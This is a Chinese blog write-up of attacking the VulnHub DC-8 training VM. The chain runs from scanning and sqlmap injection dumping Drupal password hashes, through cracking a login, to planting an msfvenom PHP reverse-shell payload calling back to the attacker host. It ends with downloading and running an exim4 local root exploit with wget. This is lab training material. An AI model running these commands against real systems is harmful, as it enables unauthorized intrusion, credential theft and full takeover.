VulnHub靶机 DC-8 打靶 详细渗透过程

2024-05-12 586 0

一、将靶机配置导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-8,367/

VulnHub靶机 DC-8 打靶 详细渗透过程插图

二、渗透测试流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

arp-scan -l

VulnHub靶机 DC-8 打靶 详细渗透过程插图1

端口扫描

nmap -p- 192.168.0.105

VulnHub靶机 DC-8 打靶 详细渗透过程插图2

开放了80端口和22端口,详细探测一下服务信息

nmap -p80 -sV -A 192.168.0.105

VulnHub靶机 DC-8 打靶 详细渗透过程插图3

探测一下指纹信息:

whatweb http://192.168.0.105

VulnHub靶机 DC-8 打靶 详细渗透过程插图4

Web渗透

SQL注入

访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS

VulnHub靶机 DC-8 打靶 详细渗透过程插图5

点击左侧,发现url当中出现id参数变化,尝试sql注入

url:http://192.168.0.105/?nid=1

VulnHub靶机 DC-8 打靶 详细渗透过程插图6

sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba --batch --dbs

VulnHub靶机 DC-8 打靶 详细渗透过程插图7

当前数据库d7db,但不是dba

VulnHub靶机 DC-8 打靶 详细渗透过程插图8

查看数据库当中的表信息,还有表中的内容

//爆数据表
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db --tables
//查看表中数据字段
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db -T users --columns
//爆字段数据
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db -T users -C "name,pass" --dump

d7db数据库当中的users数据表

VulnHub靶机 DC-8 打靶 详细渗透过程插图9

d7db数据库当中的users数据表,查看表中字段内容

VulnHub靶机 DC-8 打靶 详细渗透过程插图10

成功查询用户名和密码,将密码保存到记事本当中进行破解

VulnHub靶机 DC-8 打靶 详细渗透过程插图11

登录后台

根据用户名当中提示信息john,使用john进行hash密码破解

将密码保存到文本文件当中,john破解即可

VulnHub靶机 DC-8 打靶 详细渗透过程插图12

john 1.txt
//admin用户破解失败,john用户破解成功
//用户名和密码
john
turtle 
dirsearch -u http://192.168.0.105/ -i 200

通过目录爆破后,成功找到后台并进入

VulnHub靶机 DC-8 打靶 详细渗透过程插图13

成功进入后台

VulnHub靶机 DC-8 打靶 详细渗透过程插图14

反弹shell

找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。

这里还可以使用msf生成php反弹shell脚本,将代码放入其中即可

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 -f raw

将代码放入其中

VulnHub靶机 DC-8 打靶 详细渗透过程插图16

VulnHub靶机 DC-8 打靶 详细渗透过程插图17

然后返回提交以后才能执行代码,msf开启监听即可接受到shell

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
exploit

VulnHub靶机 DC-8 打靶 详细渗透过程插图18

成功接收shell,www-data普通权限

VulnHub靶机 DC-8 打靶 详细渗透过程插图19

获取稳定shell,查看目录下有无有价值信息,发现没有

python -c "import pty;pty.spawn('/bin/bash')"

VulnHub靶机 DC-8 打靶 详细渗透过程插图20

提权

查找系统下suid权限的命令

find / -perm -u=s -type f 2>/dev/null

VulnHub靶机 DC-8 打靶 详细渗透过程插图21

查看一下exim4版本信息

VulnHub靶机 DC-8 打靶 详细渗透过程插图22

搜索相关漏洞,进行利用

searchsploit exim 4

找到版本相近的问题

VulnHub靶机 DC-8 打靶 详细渗透过程插图23

将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务

//拷贝脚本
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /opt/exp.sh
//本地开启http服务
python -m http.server 8080

VulnHub靶机 DC-8 打靶 详细渗透过程插图24

到靶机端进行下载exp.sh即可

wget http://192.168.0.106:8080/exp.sh

VulnHub靶机 DC-8 打靶 详细渗透过程插图25

VulnHub靶机 DC-8 打靶 详细渗透过程插图26

赋予执行权限,执行一下

chmod 755 exp.sh
./exp.sh
或bash exp.sh

VulnHub靶机 DC-8 打靶 详细渗透过程插图27

查看源码,需要带参数

VulnHub靶机 DC-8 打靶 详细渗透过程插图28

VulnHub靶机 DC-8 打靶 详细渗透过程插图29

或者我们直接敲上 -h查看帮助的参数

./exp.sh -h

发现得加参数,依次尝试即可

VulnHub靶机 DC-8 打靶 详细渗透过程插图30

./exp.sh -m setuid 失败
./exp.sh -m netcat

./exp.sh -m netcat 成功提权

VulnHub靶机 DC-8 打靶 详细渗透过程插图31

VulnHub靶机 DC-8 打靶 详细渗透过程插图32

思路:

主机发现---端口扫描---服务探针---指纹识别---发现注入点---web渗透SQL注入---获取用户名密码---登入后台---发现可加载PHP代码输入PHP代码---反弹shell---提权---exim4漏洞利用


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论